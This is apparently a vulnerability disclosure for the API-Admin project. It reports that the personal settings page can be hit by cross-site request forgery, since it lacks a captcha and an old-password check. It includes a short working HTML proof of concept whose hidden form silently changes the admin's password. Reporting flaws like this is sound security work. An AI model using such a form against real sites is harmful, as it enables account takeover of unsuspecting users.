API-Admin
API-Admin copied to clipboard
There is a CSRF vulnerability in the personal settings
-
First, log in to the background, click Personal Settings. There is no captcha here and there is no requirement to verify the old password, try CSRF.
-
Then, feel free to enter a password, for example '777777', click submit, and grab the packet in Burpsuite.
-
Use the packet of the second step to generate a CSRF POC, and then visit the CSRF page in the same browser.
CSRF POC<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.190.137/admin/index/editUserinfo" method="POST"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="777777" /> <input type="hidden" name="email" value="123@qq.com" /> <input type="submit" value="Submit request" /> </form> </body> </html>